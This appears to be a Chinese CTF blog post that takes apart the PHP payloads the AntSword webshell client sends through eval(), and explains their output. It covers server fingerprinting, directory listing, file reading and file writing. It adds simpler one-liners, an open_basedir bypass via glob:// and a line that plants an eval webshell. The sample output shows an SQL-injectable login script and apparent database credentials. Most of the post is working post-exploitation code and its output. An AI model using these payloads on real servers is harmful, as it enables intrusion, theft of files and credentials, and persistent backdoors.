前段时间打ctf的时候突然发现,有时候我们getshell了,但是由于服务器大部分时候回禁用shell函数,我们往往只能使用eval(),一般意义来说,我们可以通过菜刀蚁剑这样的工具,但是如果我们的shell是通过文件包含的方式成立的,工具经常没法用,突然一下用php函数读文件写文件还需要查查看,所以今天分析下蚁剑的列目录读文件方式,需要的时候可以直接来用
我是通过分析蚁剑的语句来列出的,毕竟菜刀不支持php7
查看当前目录&查看服务器信息
代码语言:javascript复制@ini_set("display_errors", "0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo "-=:{";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("A","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;echo "}:=-";die();整理下格式
代码语言:javascript复制@ini_set("display_errors", "0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo "-=:{";
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D} ";
if(substr($D,0,1)!="/"){
foreach(range("A","Z")as $L)
if(is_dir("{$L}:"))
$R.="{$L}:";
}
else{
$R.="/";
}
$R.=" ";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();
$R.=" {$s}";
echo $R;;
echo "}:=-";
die();我们来看看返回
代码语言:javascript复制-=:{/home/wwwroot/default / Linux iZ285ei82c1Z 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 www}:=-列目录
代码语言:javascript复制@ini_set("display_errors", "0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo "-=:{";$D=base64_decode($_POST["0xbad31815"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R=" ".$T." ".@filesize($P)." ".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo "}:=-";die();修改下格式
代码语言:javascript复制@ini_set("display_errors", "0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo "-=:{";
$D=base64_decode($_POST["0xbad31815"]);
$F=@opendir($D);
if($F==NULL){
echo("ERROR:// Path Not Found Or No Permission!");
}
else{
$M=NULL;
$L=NULL;
while($N=@readdir($F)){
$P=$D."/".$N;
$T=@date("Y-m-d H:i:s",@filemtime($P));
@$E=substr(base_convert(@fileperms($P),10,8),-4);
$R=" ".$T." ".@filesize($P)." ".$E."
";
if(@is_dir($P))
$M.=$N."/".$R;
else $L.=$N.$R;
}
echo $M.$L;
@closedir($F);
};
echo "}:=-";
die();看看返回什么
代码语言:javascript复制-=:{aaaj7/ 2016-04-20 23:36:31 4096 0755
./ 2016-05-12 19:59:42 4096 0755
aaaj5/ 2016-04-11 20:19:09 4096 0755
aaaj6/ 2016-03-20 20:50:35 4096 0755
xss/ 2016-02-11 12:10:56 4096 0755
nweb1/ 2016-04-05 12:40:34 4096 0755
aaaj1/ 2016-04-11 19:15:06 4096 0755
web_aaa/ 2015-10-27 13:18:09 4096 0755
aaa_final/ 2015-12-21 14:25:49 4096 0755
aaaj3/ 2016-04-11 19:20:56 4096 0755
aaaj.bak/ 2016-03-15 13:47:09 4096 0755
mbWebTraffic/ 2015-10-10 23:44:46 4096 0755
web1/ 2015-12-20 16:04:36 4096 0755
web2/ 2015-11-05 22:41:19 4096 0755
web3/ 2015-11-05 22:46:17 4096 0755
aaaj2/ 2016-03-14 14:25:00 4096 0755
sctfq1/ 2016-04-11 15:22:00 4096 0755
CI/ 2015-12-21 13:32:32 4096 0755
aaaj4/ 2016-04-11 19:28:24 4096 0755
nweb/ 2016-04-03 21:01:51 4096 0755
web50/ 2015-12-01 15:51:02 4096 0775
websocket/ 2016-03-27 15:19:00 4096 0755
xsstmp/ 2016-01-27 22:26:40 4096 0755
table/ 2015-11-18 19:31:05 4096 0755
9d8cb6817c34555064ffc486e5a53d8e.jpg 2015-11-07 13:29:39 114461 0644
}:=-看得出来做的很清晰
里面还有个字段$_POST["0xbad31815"]=L2hvbWUvd3d3cm9vdC9kZWZhdWx0Lw==,后面就是列的目录
读文件
代码语言:javascript复制a=@ini_set("display_errors", "0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo "-=:{";$F=base64_decode($_POST["0xbad31815"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo "}:=-";die();{a=@ini_set("display_errors", "0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo "-=:{";
$F=base64_decode($_POST["0xbad31815"]);
$P=@fopen($F,"r");
echo(@fread($P,filesize($F)));
@fclose($P);;
echo "}:=-";
die();
{返回
代码语言:javascript复制-=:{<?php
$user=trim($_POST['user']);
$pass=md5(trim($_POST['pass']));
$userid=$_COOKIE['userid'];
$db = new mysqli('localhost','xx','sGya3fFLx8zPXe','xx1');
$query="select password from users where username = '".$user."' and password = '".$password."'";
$result=$db->query($query);
$result_num=$result->num_rows;
if($result_num==0)
{
echo "<script>alert('Something Error!')</script>";
echo "<script>window.location.href='./welcome.php'</script>";
}
else
{
$row=$result->fetch_assoc();
$password=$row['password'];
if($pass=$password)
{
$query = "update users set lastcookie = '".$userid."' where username = '".$user."'";
$result = $db->query($query);
header("location:./user.php");
}
else
{
echo "<script>alert('Something Error!')</script>";
echo "<script>window.location.href='./welcome.php'</script>";
}
}
?>
}:=-当然读的文件地址是$_POST["0xbad31815"] = L2hvbWUvd3d3cm9vdC9kZWZhdWx0L2hjdGZqMS9sb2dpbi5waHA=
写文件
代码语言:javascript复制a=@ini_set("display_errors", "0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo "-=:{";echo @fwrite(fopen(base64_decode($_POST["0xbad31815"]),"w"),base64_decode($_POST["0xa7418ec4"]))?"1":"0";;echo "}:=-";die();a=@ini_set("display_errors", "0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo "-=:{";
echo @fwrite(fopen(base64_decode($_POST["0xbad31815"]),"w"),base64_decode($_POST["0xa7418ec4"]))?"1":"0";;
echo "}:=-";
die();写的文件地址还是$_POST["0xbad31815"] = L2hvbWUvd3d3cm9vdC9kZWZhdWx0L2hjdGZqMS9sb2dpbi5waHA=
写的文件内容
代码语言:javascript复制$_POST["0xa7418ec4"] = PD9waHANCgkkdXNlcj10cmltKCRfUE9TVFsndXNlciddKTsNCgkkcGFzcz1tZDUodHJpbSgkX1BPU1RbJ3Bhc3MnXSkpOw0KCSR1c2VyaWQ9JF9DT09LSUVbJ3VzZXJpZCddOw0KDQoJICRkYiA9IG5ldyBteXNxbGkoJ2xvY2FsaG9zdCcsJ3dlYjExMScsJ3NHeWEzZkZMajV1OHpQWGUnLCdoY3Rmd2ViMScpOw0KDQoJJHF1ZXJ5PSJzZWxlY3QgcGFzc3dvcmQgZnJvbSB1c2VycyB3aGVyZSB1c2VybmFtZSA9ICciLiR1c2VyLiInIGFuZCBwYXNzd29yZCA9ICciLiRwYXNzd29yZC4iJyI7DQoJJHJlc3VsdD0kZGItPnF1ZXJ5KCRxdWVyeSk7DQoJJHJlc3VsdF9udW09JHJlc3VsdC0 bnVtX3Jvd3M7DQoJaWYoJHJlc3VsdF9udW09PTApDQoJew0KCQllY2hvICI8c2NyaXB0PmFsZXJ0KCdTb21ldGhpbmcgRXJyb3IhJyk8L3NjcmlwdD4iOw0KCQllY2hvICI8c2NyaXB0PndpbmRvdy5sb2NhdGlvbi5ocmVmPScuL3dlbGNvbWUucGhwJzwvc2NyaXB0PiI7CQ0KCX0NCg0KCWVsc2UNCgl7DQoJCSRyb3c9JHJlc3VsdC0 ZmV0Y2hfYXNzb2MoKTsNCgkJJHBhc3N3b3JkPSRyb3dbJ3Bhc3N3b3JkJ107DQoJCWlmKCRwYXNzPSRwYXNzd29yZCkNCgkJew0KCQkJJHF1ZXJ5ID0gInVwZGF0ZSB1c2VycyBzZXQgbGFzdGNvb2tpZSA9ICciLiR1c2VyaWQuIicgd2hlcmUgdXNlcm5hbWUgPSAnIi4kdXNlci4iJyI7DQoJCQkkcmVzdWx0ID0gJGRiLT5xdWVyeSgkcXVlcnkpOw0KCQkJaGVhZGVyKCJsb2NhdGlvbjouL3VzZXIucGhwIik7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQllY2hvICI8c2NyaXB0PmFsZXJ0KCdTb21ldGhpbmcgRXJyb3IhJyk8L3NjcmlwdD4iOw0KICAgICAgICAgICAgICAgICAgICAgICAgZWNobyAiPHNjcmlwdD53aW5kb3cubG9jYXRpb24uaHJlZj0nLi93ZWxjb21lLnBocCc8L3NjcmlwdD4iOw0KCQl9DQoNCgl9DQoJDQo/Pg0K简单的方式
除了蚁剑的针对大型的服务器外,其实没必要那么复杂就可以获取我们想要的信息了
列目录
代码语言:javascript复制a=echo "<br />";$handler = opendir('./');while( ($filename = readdir($handler)) !== false ) {echo $filename."<br/>";}由于可能有open_basedir的问题,所以需要绕过 http://drops.wooyun.org/tips/3978
代码语言:javascript复制<?php
printf('<b>open_basedir : %s </b><br />', ini_get('open_basedir'));
$file_list = array();
// normal files
$it = new DirectoryIterator("glob:///home/wwwroot/*");
foreach($it as $f) {
$file_list[] = $f->__toString();
}
// special files (starting with a dot(.))
$it = new DirectoryIterator("glob:///home/wwwroot/.*");
foreach($it as $f) {
$file_list[] = $f->__toString();
}
sort($file_list);
foreach($file_list as $f){
echo "{$f}<br/>";
}
?>读文件
代码语言:javascript复制a=$username=file_get_contents('./4ff692fb12aa996e27f0a108bfc386c2');var_dump($username);写文件
代码语言:javascript复制file_put_contents("/home/wwwroot/hackme/05d6a8025a7d0c0eee5f6d12a0a94cc9/shell.php",'<?php eval($_POST[1]);?>');
